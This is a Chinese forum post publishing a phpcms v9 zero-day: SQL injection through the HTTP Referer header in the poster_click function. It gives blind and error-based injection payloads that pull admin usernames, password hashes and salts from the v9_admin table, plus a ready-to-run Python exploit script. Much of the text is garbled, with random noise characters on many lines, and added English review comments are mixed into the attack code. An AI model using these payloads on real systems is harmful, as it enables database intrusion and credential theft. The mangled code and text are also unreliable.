有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数:\phpcms\modules\poster\index.php
Y/ }# _1 ]/ X4 k5 e$ l. @; E0 N, Z
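public function poster_click() {
    /**
     * Record a click on a poster (ad) and redirect the visitor to its link.
     *
     * Reads $_GET['id'] (poster id), $_GET['siteid'], $_GET['url'] (the
     * chosen link when the poster carries several), the 'username' cookie,
     * the client IP and HTTP_REFERER. Writes one click row through
     * $this->s_db->insert(), bumps the poster's 'clicks' counter, and then
     * emits a Location header. Returns false when no poster row exists.
     *
     * Security notes:
     *  - HTTP_REFERER and the cookie-derived $username are attacker
     *    controlled and go straight into s_db->insert(). This method cannot
     *    make that write safe on its own; the insert layer has to
     *    escape/bind every value. TODO(review): confirm s_db->insert does —
     *    the write-up on this page reports that it does not.
     *  - $_GET['url'] was previously sent back to the browser unchanged
     *    (open redirect). It is now honoured only when it equals one of the
     *    poster's configured linkurl values.
     */
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id' => $id));
    // get_one() is expected to return a row array or a falsy value; anything
    // that is not a non-empty array cannot be used below ($r['setting']).
    if (!is_array($r) || empty($r)) return false;

    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';

    if ($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // NOTE(review): 'referer' and 'username' are untrusted strings; see the
        // docblock above. Only 'siteid' and 'pid' are integer-coerced here.
        $this->s_db->insert(array(
            'siteid'    => $siteid,
            'pid'       => $id,
            'username'  => $username,
            'area'      => $area,
            'ip'        => $ip,
            'referer'   => HTTP_REFERER,
            'clicktime' => SYS_TIME,
            'type'      => 1,
        ));
    }
    $this->db->update(array('clicks' => '+=1'), array('id' => $id));

    $setting = string2array($r['setting']);
    // string2array() may hand back something that is not an array; count()
    // on a non-array is a TypeError on PHP 8, so normalise first.
    if (!is_array($setting)) {
        $setting = array();
    }
    $default_url = isset($setting['1']['linkurl']) ? $setting['1']['linkurl'] : '';
    $url = $default_url;
    if (count($setting) != 1 && isset($_GET['url'])) {
        // Redirect only to a URL this poster is configured with: the request
        // value is attacker-controlled. Assumes the legitimate caller passes
        // one of the configured linkurls — TODO(review): confirm against the
        // poster's client-side code.
        foreach ($setting as $item) {
            if (isset($item['linkurl']) && (string)$item['linkurl'] === (string)$_GET['url']) {
                $url = $item['linkurl'];
                break;
            }
        }
    }
    header('Location: ' . $url);
}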
. n5 \3 n }& {* v) @( r
" Y! o# c1 {( ?7 g6 e+ Y! e, q
利用方式:
* p0 o! \& f R9 q% o7 Z% d- i, F
1、可以采用盲注入的手法:
3 i. C3 t5 G3 v( U, W* V
0 ?8 K2 n" \0 qreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
$ r8 s8 B9 a1 S4 ]( A" Z$ d% k& u7 ~9 |1 E. J. x: B( a
通过返回页面正常与否,逐个猜解密码字段。
a" M7 O) s. b( v( s5 z# ^$ N. m/ _4 Z" \0 t
2、代码是花开写的,随手附上了:
& u: @7 f2 e1 G3 u: ?
X& M: m+ O3 F/ n4 T. @9 T1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
6 ?9 q# K- g8 V5 p% |3 W3 \9 Y2 \8 L C; a
此方法是报错注入手法,原理自查。
. N4 ]/ i6 R- i
' ?$ Y; E+ x2 g- U- A4 V
Z- i4 n4 ^6 K2 e
利用程序:
4 q' t+ B) p9 {/ M+ }/ u v9 v Q4 Y, e2 t& h$ k, V
#!/usr/bin/env python
h: k' Q$ l& J, _! ?6 qimport httplib,sys,re
U2 V. L) B& @( D
/ g& @5 o2 }. V' P" ?def attack():5 F$ T# W: d! I( O; j% G
# Proof-of-concept from the write-up above (Python 2: httplib, print statements).
# It sends a single GET to the phpcms poster_click endpoint with a crafted
# Referer header and reads the result back out of the MySQL "Duplicate entry"
# error text in the response body (error-based injection).
# Defender's view: the injected value travels in the Referer header, so log and
# inspect that header; the technique only works while database errors are
# echoed to the client, so hide DB errors in production and escape/bind the
# referer value before the poster click row is inserted.
print “Code by Pax.Mac Team conqu3r!”
8 {3 u: z9 g1 r4 y( e5 U& oprint “Welcome to our zone!!!”$ ~" }/ P0 C+ t R& ^# h
# argv[1] is the host handed to HTTPConnection, argv[2] the path prefix of
# the phpcms install (see the usage text in the __main__ block).
url=sys.argv[1]
; e) n, m. S" ~3 f% y: r; x- wpaths=sys.argv[2]
# z+ y: f0 ]& y% i mconn = httplib.HTTPConnection(url)+ d3 l4 }, U3 A. w
# The injection payload is carried entirely in the Referer header below.
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
( |! X; \5 A: r' s; d" M“Accept”: “text/plain”,- \/ V$ s1 k. G: J* S, c
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
; Z# e. J1 }4 M6 q' T" Tconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers): m7 `- S: a2 E- ?: ?
r1 = conn.getresponse()/ f& K2 Y9 A$ N5 `) U! N( C
datas=r1.read()
# Pulls the first "Duplicate entry '...'" fragment out of the response body;
# datas[0] raises IndexError when the server does not leak the DB error.
; E; h) d+ |* h) G3 ]* B+ Gdatas=re.findall(r”Duplicate entry \’\w+’”, datas), a) v" s7 N1 u: z+ |
print datas[0]
$ g0 B( A( F# K1 P! v, Uconn.close() R* b: g9 w4 c7 \$ h
# Entry point: needs a host and a path-prefix argument, otherwise prints the
# usage text (note the "Usgae" typo is in the original) and exits with 1.
if __name__==”__main__”:* \% w0 _/ A2 E. w9 W# Q
if len(sys.argv)<3:9 v$ B0 _7 G" d
print “Code by Pax.Mac Team conqu3r”/ m3 m, k, q, g1 P
print “Usgae:”9 M+ Y h7 c* j; e3 u& O
print “ phpcmsattack.py www.paxmac.org /”7 G" E- o% l# ~
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
o3 }9 Y9 S8 W8 t( `4 fsys.exit(1); d. N1 J8 x9 \( H" C/ r; t2 r: X
attack()+ L& U2 [5 \6 |: F* W3 D) D3 J
6 M% r; s$ N. f) [
|